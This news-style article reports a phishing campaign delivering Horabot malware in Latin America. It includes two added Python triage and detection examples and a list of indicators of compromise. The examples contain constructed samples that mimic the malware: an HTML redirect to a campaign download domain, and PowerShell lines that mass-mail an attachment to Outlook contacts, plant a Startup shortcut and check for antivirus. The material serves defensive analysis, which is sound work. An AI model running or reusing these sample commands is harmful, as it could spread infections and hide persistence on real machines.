Threat Actors Leverage Weaponized HTML Files to Deliver Horabot Malware

FortiGuard Labs has uncovered a phishing campaign that delivers the Horabot malware, predominantly targeting Spanish-speaking users in Latin America.

This high-severity threat, detailed in the 2025 Global Threat Landscape Report, relies on malicious HTML files delivered as phishing email attachments to steal sensitive information, including email credentials and banking data, while spreading further through corporate and personal mailboxes.

Active since at least April 2025, the campaign focuses on users in countries such as Mexico, Guatemala, Colombia, Peru, Chile, and Argentina, using culturally tailored emails masquerading as legitimate invoices to deceive victims.

Sophisticated Phishing Campaign

The attack begins with a phishing email written in Spanish, often claiming to include a PDF invoice under subject lines like “Factura Adjunta” (Attached Invoice).

Figure: phishing email sample

These emails lure recipients into opening a ZIP attachment containing a malicious HTML file with Base64-encoded data.

Once decoded, the HTML reveals a remote URL that downloads a secondary payload, a ZIP file named “ADJUNTOS_23042025.zip,” housing an HTA file.
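The two steps above (a Base64 blob inside the HTML attachment that, once decoded, reveals the URL of the second-stage ZIP) are exactly what a triage script should automate. The following is an added example, not code from the article or from Fortinet: it pulls long Base64 runs out of an HTML file, strictly decodes them, recurses into nested layers, extracts any URLs that appear, and matches their hosts against the domains listed in the article's IOC table. The sample HTML is constructed for the example, and the assumption that the ZIP is hosted on one of the IOC domains is the example's own; the page does not say which host serves ADJUNTOS_23042025.zip.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit

# Domains from the article's IOC table, with the defanging brackets removed so they
# can be compared against hosts extracted from decoded URLs.
IOC_DOMAINS = {"t4.contactswebaccion.store", "labodeguitaup.space"}

# A Base64 run long enough to be worth decoding, with optional '=' padding.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL_PATTERN = re.compile(r"https?://[^\s'\"<>)]+")


def find_base64_blobs(text):
    """Return every long Base64-looking run in the text."""
    return BASE64_RUN.findall(text)


def decode_blob(blob):
    """Strictly decode one Base64 run to text; None if invalid or not printable."""
    padded = blob + "=" * (-len(blob) % 4)   # tolerate stripped padding
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    # Binary blobs (images, archives) are not what we are after here.
    if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def extract_urls(text):
    return URL_PATTERN.findall(text)


def triage_html(html_text, max_depth=3):
    """Peel nested Base64 layers out of an HTML attachment and collect revealed URLs.

    Returns the URLs seen at any layer, the ones that were only visible after
    decoding, the IOC domains among their hosts, and how many layers were decoded.
    """
    first_seen = {}            # url -> shallowest layer at which it appeared
    layers = 0
    pending = [(html_text, 0)]
    while pending:
        text, depth = pending.pop()
        for url in extract_urls(text):
            first_seen[url] = min(depth, first_seen.get(url, depth))
        if depth >= max_depth:
            continue
        for blob in find_base64_blobs(text):
            decoded = decode_blob(blob)
            if decoded is not None:
                layers = max(layers, depth + 1)
                pending.append((decoded, depth + 1))
    hosts = {urlsplit(u).hostname for u in first_seen}
    return {
        "urls": sorted(first_seen),
        "hidden_urls": sorted(u for u, d in first_seen.items() if d > 0),
        "ioc_hits": sorted(h for h in hosts if h in IOC_DOMAINS),
        "decoded_layers": layers,
    }


def _b64(s):
    return base64.b64encode(s.encode()).decode()


# Constructed sample, NOT the real Horabot attachment: an invoice-themed page whose
# script holds a Base64 string that decodes to another atob() stage, which in turn
# redirects to the second-stage ZIP. The hosting domain is assumed for the example.
_STAGE2 = ("<script>window.location='https://t4.contactswebaccion.store/"
           "ADJUNTOS_23042025.zip'</script>")
_STAGE1 = '<script>document.write(atob("%s"))</script>' % _b64(_STAGE2)
SAMPLE_HTML = (
    "<html><body><p>Factura adjunta</p>\n"
    '<script>var p = "%s";\ndocument.write(atob(p));</script>\n'
    "</body></html>\n" % _b64(_STAGE1)
)

if __name__ == "__main__":
    for key, value in triage_html(SAMPLE_HTML).items():
        print(f"{key}: {value}")
```

Run it against a real attachment with `triage_html(open(path, encoding="utf-8", errors="replace").read())`; anything in `hidden_urls` is a download location the HTML was hiding from static inspection and belongs in the incident's IOC list, and a non-empty `ioc_hits` is a direct match on the campaign infrastructure the article lists.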

According to Fortinet's report, the HTA file uses browser redirection tricks to load further malicious scripts, starting a multi-stage infection chain built from VBScript, AutoIt, and PowerShell.

The VBScript, hosted on remote servers, uses custom string decoding to evade static detection. It checks the environment for antivirus software (e.g., Avast) and for virtual machines, and establishes persistence by placing shortcuts in the Startup folder.

It also collects system information, such as IP addresses and usernames, and sends it to command-and-control (C2) servers.

Multi-Stage Attack Chain

Subsequent payloads include an AutoIt script that decrypts a malicious DLL with a hardcoded key, enabling the theft of browser data from browsers including Google Chrome, Microsoft Edge, and Opera, and displaying fake pop-up windows to capture login credentials.

Figure: AutoIt script

In parallel, PowerShell scripts use Outlook COM automation to harvest the victim's contact list, filter out addresses at certain domains (e.g., Gmail, Hotmail), and send tailored phishing emails with malicious attachments to the remaining contacts, spreading the infection from the victim's own mailbox to new targets.

This self-propagation, combined with cleanup routines that erase traces, makes Horabot stealthy and hard to detect, since its activity blends in with legitimate Windows and Outlook behavior.
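Because the propagation stage drives Outlook through COM from PowerShell, and the VBScript stage drops a shortcut into the Startup folder and looks for antivirus processes, the behaviors the article describes can be turned into simple content rules over script text. The following is an added example, not code from the article or from Fortinet: it applies a small rule set to constructed PowerShell script block logging records (Event ID 4104, `ScriptBlockText` field) and flags the three behaviors described above, while leaving a benign Outlook query and a benign file listing alone. The indicator strings, the extra antivirus names beyond Avast, and the idea that the shortcut would be created from PowerShell rather than VBScript are the example's own assumptions; `scan_script_block` takes plain text, so the same rules can be run over a recovered VBScript file as well.

```python
import re

# Rules distilled from the behaviors the article describes. Every pattern in a rule
# must match. The indicator strings are assumptions about how such a script would
# look, not strings copied from the real sample.
RULES = [
    {
        "name": "outlook_com_mass_mail",
        "patterns": [
            r"-ComObject\s+Outlook\.Application",
            r"GetDefaultFolder\(10\)|\.Contacts\b|AddressLists",  # olFolderContacts = 10
            r"\.Attachments\.Add\(",
            r"\.Send\(\)",
        ],
        "description": "Outlook automated to enumerate contacts and send mail with attachments",
    },
    {
        "name": "startup_shortcut_persistence",
        "patterns": [r"-ComObject\s+WScript\.Shell", r"CreateShortcut\(", r"\\Startup\\"],
        "description": "shortcut written into a Startup folder",
    },
    {
        "name": "av_process_check",
        # Avast is named in the article; the other product names are assumed.
        "patterns": [r"Get-Process", r"\b(avast|avg|kaspersky|eset)\b"],
        "description": "process list inspected for antivirus products",
    },
]


def scan_script_block(text):
    """Return the names of all rules whose patterns all match the given script text."""
    hits = []
    for rule in RULES:
        if all(re.search(p, text, re.IGNORECASE) for p in rule["patterns"]):
            hits.append(rule["name"])
    return hits


def scan_events(events):
    """Apply the rules to script block logging records (Event ID 4104 style dicts)."""
    findings = []
    for idx, ev in enumerate(events):
        if ev.get("EventID") != 4104:
            continue
        for name in scan_script_block(ev.get("ScriptBlockText", "")):
            findings.append({"event": idx, "rule": name, "computer": ev.get("Computer")})
    return findings


# Constructed log records for the example; none of these script blocks is from the
# real campaign.
SAMPLE_EVENTS = [
    {"EventID": 4104, "Computer": "WS01", "ScriptBlockText":
     r"$o = New-Object -ComObject Outlook.Application; $ns = $o.GetNamespace('MAPI'); "
     r"$items = $ns.GetDefaultFolder(10).Items; foreach ($c in $items) { "
     r"if ($c.Email1Address -notmatch 'gmail|hotmail') { $m = $o.CreateItem(0); "
     r"$m.To = $c.Email1Address; $m.Attachments.Add('C:\Users\Public\factura.zip'); $m.Send() } }"},
    {"EventID": 4104, "Computer": "WS01", "ScriptBlockText":
     r"Get-Process | Where-Object { $_.ProcessName -match 'avast' }"},
    {"EventID": 4104, "Computer": "WS01", "ScriptBlockText":
     r'$ws = New-Object -ComObject WScript.Shell; $lnk = $ws.CreateShortcut('
     r'"$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"); '
     r'$lnk.TargetPath = "C:\Users\Public\run.vbs"; $lnk.Save()'},
    # Benign: a directory listing.
    {"EventID": 4104, "Computer": "WS02", "ScriptBlockText":
     r"Get-ChildItem -Path C:\Reports | Sort-Object LastWriteTime"},
    # Benign: reads the contact count but never attaches or sends anything.
    {"EventID": 4104, "Computer": "WS02", "ScriptBlockText":
     r"$o = New-Object -ComObject Outlook.Application; "
     r"$o.GetNamespace('MAPI').GetDefaultFolder(10).Items.Count"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"event {f['event']} on {f['computer']}: {f['rule']}")
```

The rules are deliberately conjunctive: instantiating `Outlook.Application` from PowerShell is common in administrative scripts, so the mass-mail rule only fires when contact enumeration, an attachment and `.Send()` appear together in one script block. To feed it real data, export the Microsoft-Windows-PowerShell/Operational log to JSON and map each record's `EventID`, `Computer` and `ScriptBlockText` into the dict shape used above.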

FortiGuard Labs emphasizes the growing sophistication of such phishing attacks, urging organizations to implement robust email filtering, monitor for anomalous file activity, and educate employees on recognizing phishing attempts.

Fortinet’s security products, including FortiGate and FortiMail, detect and block this malware under signatures such as HTML/Phishing.683A!tr and AutoIt/Agent.HA!tr for customers with up-to-date signature databases.

Additionally, free cybersecurity training from Fortinet is recommended to bolster user awareness.

Indicators of Compromise (IOCs)

Type             Value
Domain           t4[.]contactswebaccion[.]store
Domain           labodeguitaup[.]space
IP               209[.]74[.]71[.]168
IP               93[.]127[.]200[.]211
SHA256 (Script)  523d7e9005b2e431068130989caf4a96062a029b50a5455d37a2b88e6d04f83d
SHA256 (AutoIt)  25be06643204fc7386db3af84b200d362c3287b30c7491b666c4fe821a8c6eb4
